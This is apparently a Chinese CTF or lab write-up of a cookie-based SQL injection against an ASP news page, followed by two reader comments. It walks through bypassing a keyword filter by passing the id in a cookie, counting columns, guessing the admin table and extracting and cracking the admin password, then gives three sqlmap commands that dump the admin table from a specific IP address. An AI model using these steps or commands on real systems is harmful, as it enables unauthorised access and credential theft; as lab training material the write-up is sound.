一、手工
找一个在数据库中存放内容的链接(即点击链接为查询数据库的操作),在变量动态id后加 and 1=1 ,弹出对话框,说明对
传参进行了and update delete insert mid master等字符的过滤。
利用cookie提交,会出现一个弹框,点确认
返回刚刚的页面,把ID删除后一样能正常显示。说明服务器能接收cookie传的id参数。
我们输入能正常显示,
不能正常显示如下图:
现在利用二分法,判断字段,
直到出现错误,如下图,
说明有10个字段,下面猜表,我们按一般思路表可能是admin;
可以看到显示内容为23789,说明可以把23789换成我们要查询的数据。我们把7和8换成要查询
的password和username
显示出了用户名和密码(密码为CMD5加密的),再去CMD5网站上解密
查出密码为welcome,猜测后台登录地址一般为..../admin,
输入用户名和密码,登录后台拿到flag
二、sqlmap
sqlmap.py -u "http://120.203.13.75:8001/shownews.asp?" cookie "id=170" --table --level 2
sqlmap.py -u "http://120.203.13.75:8001/shownews.asp?" cookie "id=170" --columns -T admin --level 2
sqlmap.py -u "http://120.203.13.75:8001/shownews.asp?" cookie "id=170" --dump -T admin -C "username,password" --level 2
也得到了用户名和密码
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
1697571223
发表于 2018-9-5
是的,我也尝试过用sql工具注入,也是可以爆出密码。但是当时有个高人告诉我,用工具的话就不能发现注入的乐趣。我就重新尝试了用手工注入。
然后,谢谢分享了
。
评论列表
加载数据中...
ffyema
发表于 2022-7-21
万一不是admin表呢
评论列表
加载数据中...